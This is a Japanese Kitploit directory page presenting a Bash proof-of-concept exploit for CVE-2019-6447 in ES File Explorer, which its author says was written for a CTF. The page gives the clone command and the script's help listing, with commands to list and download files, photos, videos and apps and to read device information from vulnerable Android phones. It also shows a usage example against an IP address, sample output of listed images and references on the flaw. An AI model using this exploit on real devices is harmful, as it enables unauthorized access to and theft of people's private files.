Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
POC-ES-File-Explorer-CVE-2019-6447 — ES File ExplorerのCVE-2019-6447を悪用するBash PoCスクリプトで、脆弱なAndroidデバイスからファイル、写真、ビデオ、アプリを一覧表示し、ファイルをダウンロードします。 | Kitploit
ツール/GitHubGitHub/julio-cfa/poc-es-file-explorer-cve-2019-6447
Androidセキュリティ脆弱性分析エクスプロイトデータ流出情報収集モバイルセキュリティ
GitHubjulio-cfa/poc-es-file-explorer-cve-2019-6447

POC-ES-File-Explorer-CVE-2019-6447

ES File ExplorerのCVE-2019-6447を悪用するBash PoCスクリプトで、脆弱なAndroidデバイスからファイル、写真、ビデオ、アプリを一覧表示し、ファイルをダウンロードします。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
34年前未レビュー

PoC ES File Explorer 4.1.9.7.4 (CVE-2019-6447)

これは、CVE-2019-6447 の PoC の bash による非常にシンプルな実装です。基本的に curl を使用して適切なパラメータでリクエストを送信します。CTF 中に同様のスクリプトを探していたのですが見つからなかったため、作成しました。元のスクリプトを自由に変更して、お好みに合わせてカスタマイズできます。

インストール:

リポジトリをクローンして、.sh ファイルを使用するだけです。

root@kitploit:~
git clone [email protected]:julio-cfa/POC-ES-File-Explorer-CVE-2019-6447.git

または、raw コンテンツをコピーしてファイルに貼り付けます。

使用方法:

root@kitploit:~
kyoto :: ~ % ./ESExplorerExploit.sh -h                            

--- これは ES File Explorer CVE-2019-6447 の非常にシンプルな PoC です ---

次のコマンドを試せます: 

listFiles	すべてのファイルを一覧表示
listPics	すべての画像を一覧表示
listVideos	すべての動画を一覧表示
listAudios	すべての音声を一覧表示
listApps	インストールされているすべてのアプリケーションを一覧表示
listAppsSystem	システムアプリを一覧表示
listAppsPhone	通信関連アプリケーションを一覧表示
listAppsSdcard	SDカードにインストールされているアプリを一覧表示
listAppsAll	すべてのアプリケーションを一覧表示
getAppThumbnail	指定されたアプリケーションのアイコンを一覧表示
appLaunch	開発されたアプリケーションを起動
appPull         デバイスからアプリケーションをダウンロード
getDeviceInfo	システム情報を取得

使用例: ./ESExplorerExploit.sh 10.10.10.247 sdcard listFiles

例:

root@kitploit:~
kyoto :: ~ % ./ESExplorerExploit.sh 10.10.10.247 sdcard/DCIM listFiles                                                                               
[
{"name":"example1.jpg", "time":"4/21/21 02:38:08 AM", "type":"file", "size":"135.33 KB (138,573 Bytes)", }, 
{"name":"example2.png", "time":"4/21/21 02:37:50 AM", "type":"file", "size":"6.24 KB (6,392 Bytes)", }, 
{"name":"example3.jpg", "time":"4/21/21 02:38:18 AM", "type":"file", "size":"1.14 MB (1,200,401 Bytes)", }, 
{"name":"example4.png", "time":"4/21/21 02:37:21 AM", "type":"file", "size":"124.88 KB (127,876 Bytes)", }
]

参考資料:

このエクスプロイトが内部でどのように動作するのか気になる場合、または失敗して独自のスクリプトを作成する必要がある場合は、以下のリンクを参照してください:

https://packetstormsecurity.com/files/163303/ES-File-Explorer-4.1.9.7.4-Arbitrary-File-Read.html
https://github.com/fs0c131y/ESFileExplorerOpenPortVuln
https://www.safe.security/assets/img/research-paper/pdf/es-file-explorer-vulnerability.pdf
https://medium.com/@knownsec404team/analysis-of-es-file-explorer-security-vulnerability-cve-2019-6447-7f34407ed566

ツールをダウンロード